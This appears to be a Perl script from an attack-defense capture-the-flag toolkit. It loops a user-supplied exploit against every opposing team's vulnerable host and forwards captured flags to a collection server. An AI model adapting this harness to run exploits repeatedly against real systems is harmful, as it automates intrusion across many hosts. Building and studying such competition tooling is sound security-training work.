PageRenderTime 24ms CodeModel.GetById 20ms RepoModel.GetById 1ms app.codeStats 0ms

/client-unix/run_me.pl

http://exploitfarm.googlecode.com/
Perl | 177 lines | 134 code | 33 blank | 10 comment | 9 complexity | 0055d05c6d3d52669e0f533a9e498d0c MD5 | raw file
    

  1. #!/usr/bin/perl

    2. 

  2. $|++;

    3. 

  3. 

    4. 

  4. ### Change this

    5. 

  5. our $exploit='./exploit'; #Exploit file name!

    6. 

  6. our $exploit_name='EXPLOIT_NAME'; #<<<<<<<<< Won`t work if you don`t change it!

    7. 

  7. 

    8. 

  8. 

    9. 

  9. ### Do not touch!

    10. 

  10. 

    11. 

  11. our $server_ip='10.15.1.130';

    12. 

  12. our $server_port=62674;

    13. 

  13. 

    14. 

  14. our $logs_dir='logs';

    15. 

  15. our $log=$logs_dir . '/' . $exploit . '.txt';

    16. 

  16. our $exploit_timeout=20;

    17. 

  17. 

    18. 

  18. our $sleep_before_next_loop=1;

    19. 

  19. our $teams_file='teams.txt';

    20. 

  20. 

    21. 

  21. our $vulnerable_box_suffix='3'; ###<<<!

    22. 

  22. 

    23. 

  23. 

    24. 

  24. our %teams_pid;

    25. 

  25. our %exploit_id;

    26. 

  26. 

    27. 

  27. use lib 'mods';

    28. 

  28. use viable_socket;

    29. 

  29. use POSIX ":sys_wait_h";

    30. 

  30. use POSIX;

    31. 

  31. use Socket;

    32. 

  32. 

    33. 

  33. die 'Change $exploit_name !' if ($exploit_name eq 'EXPLOIT_NAME');

    34. 

  34. 

    35. 

  35. start();

    36. 

  36. $SIG{CHLD} = \&REAPER;

    37. 

  37. serve();

    38. 

  38. 

    39. 

  39. 

    40. 

  40. sub REAPER

    41. 

  41. {

    42. 

  42.     my $child;

    43. 

  43.     my $team;

    44. 

  44.     # If a second child dies while in the signal handler caused by the

    45. 

  45.     # first death, we won't get another signal. So must loop here else

    46. 

  46.     # we will leave the unreaped child as a zombie. And the next time

    47. 

  47.     # two children die we get another zombie. And so on.

    48. 

  48.     while (($child = waitpid(-1,WNOHANG)) > 0)

    49. 

  49.     {

    50. 

  50. 	#$Kid_Status{$child} = $?;

    51. 

  51. 	my $status=$?;

    52. 

  52. 	$team=$teams_pid{$child};

    53. 

  53. 	print "-- Team $team loop end. Status: $status\n";

    54. 

  54. 	print "Somthing wrong in script with team $team\n" if ($status != 0);

    55. 

  55. 	delete $teams_pid{$child};

    56. 

  56. 

    57. 

  57. 	doit_start($team);

    58. 

  58.     } 

    59. 

  59.     $SIG{CHLD} = \&REAPER;  # still loathe sysV

    60. 

  60. }

    61. 

  61. 

    62. 

  62. sub alarmer

    63. 

  63. {

    64. 

  64.     print "In process $$ team $team killing $exploit_pid\n";

    65. 

  65.     kill TERM,$exploit_pid;

    66. 

  66.     sleep(1);

    67. 

  67.     kill KILL,$sxploit_pid;

    68. 

  68.     close($exploit_fd);

    69. 

  69. }

    70. 

  70. 

    71. 

  71. $SIG{CHLD} = \&REAPER;

    72. 

  72. $SIG{ALRM} = \&alarmer;

    73. 

  73. 

    74. 

  74. 

    75. 

  75. 

    76. 

  76. sub make_socket

    77. 

  77. {

    78. 

  78.     my $sock;

    79. 

  79.     my $remote  = $server_ip;

    80. 

  80.     my $port    = $server_port;

    81. 

  81.     my $iaddr   = inet_aton($remote) or die("no host: $remote");

    82. 

  82.     my $paddr   = sockaddr_in($port, $iaddr);

    83. 

  83. 

    84. 

  84.     my $proto   = getprotobyname('tcp');

    85. 

  85.     socket($sock, PF_INET, SOCK_STREAM, $proto)  or die("socket: $!");

    86. 

  86.     connect($sock, $paddr) or die("connect: $!");

    87. 

  87. 

    88. 

  88.     select $sock;

    89. 

  89.     $|++;

    90. 

  90.     select STDOUT;

    91. 

  91. 

    92. 

  92.     print $sock "$exploit_name $team\r\n";

    93. 

  93.     

    94. 

  94.     return $sock;

    95. 

  95. }

    96. 

  96. 						    

    97. 

  97. 

    98. 

  98. sub send_flag

    99. 

  99. {

    100. 

  100.     my $flag=shift;

    101. 

  101.     $server->print("$flag\r\n");

    102. 

  102. }

    103. 

  103. 

    104. 

  104. sub doit_one

    105. 

  105. {

    106. 

  106.     our $team=shift;

    107. 

  107.     my $e;

    108. 

  108.     our $server=new viable_socket(\&make_socket);

    109. 

  109. 

    110. 

  110.     while(1)

    111. 

  111.     {

    112. 

  112.     

    113. 

  113. 	print ">>>Team $team next loop!\n";

    114. 

  114. 	our $exploit_fd;

    115. 

  115. 	our $exploit_pid=open $exploit_fd,"$exploit $team 2>> $log |";

    116. 

  116. 	alarm($exploit_timeout);

    117. 

  117. 	while(<$exploit_fd>)

    118. 

  118. 	{

    119. 

  119. 	    alarm 0;

    120. 

  120. 	    s/[\r\n]+$//g;

    121. 

  121. 	    send_flag($_);

    122. 

  122. 	    alarm($exploit_timeout);

    123. 

  123. 	}

    124. 

  124. 	alarm 0;

    125. 

  125. 	close($exploit_fd);

    126. 

  126. 	my $status=$?;

    127. 

  127. #	print "\t\tTeam $team ends loop and relaxing a bit before next\n";

    128. 

  128. 	sleep($sleep_before_next_loop);

    129. 

  129. #	print "\t\tTeam $team > next loop!\n";

    130. 

  130.     }

    131. 

  131.     exit($status);

    132. 

  132. }

    133. 

  133. 

    134. 

  134. sub doit_start

    135. 

  135. {

    136. 

  136.     my $team=shift;

    137. 

  137.     my $pid=fork();

    138. 

  138. 

    139. 

  139.     if ($pid > 0) #parent

    140. 

  140.     {

    141. 

  141. 	$teams_pid{$pid}=$team;

    142. 

  142.     }elsif ($pid==0) #child

    143. 

  143.     {

    144. 

  144. 	doit_one($team);

    145. 

  145.     }else #error

    146. 

  146.     {

    147. 

  147. 	print "Internal Error: Can`t fork!\n";

    148. 

  148. 	return 1;

    149. 

  149.     }

    150. 

  150.     return 0;

    151. 

  151. }

    152. 

  152. 

    153. 

  153. sub start

    154. 

  154. {

    155. 

  155.     print "Starting...\n";

    156. 

  156.     open F,$teams_file or die "Can`t open team file '$teams_file' : $!\n";

    157. 

  157.     while (<F>)

    158. 

  158.     {

    159. 

  159. 	next if (/^#/);

    160. 

  160. 	chomp;

    161. 

  161. 	/^(.+?)\t+(.+)$/;

    162. 

  162. 	$t=$1;

    163. 

  163. 	$ip=$2;

    164. 

  164. 	next if ($t =~ /^$team$/i);

    165. 

  165. 	$ip.=$vulnerable_box_suffix;

    166. 

  166. 	print "Starting '$1' team, IP: '$ip'\n";

    167. 

  167.         doit_start($ip);

    168. 

  168.     }

    169. 

  169. }

    170. 

  170. 

    171. 

  171. sub serve

    172. 

  172. {

    173. 

  173.     while (1)

    174. 

  174.     {

    175. 

  175. 	sleep 12000; #do nothing :) Just waiting for signal

    176. 

  176.     }

    177. 

  177. }

    178. 

  178.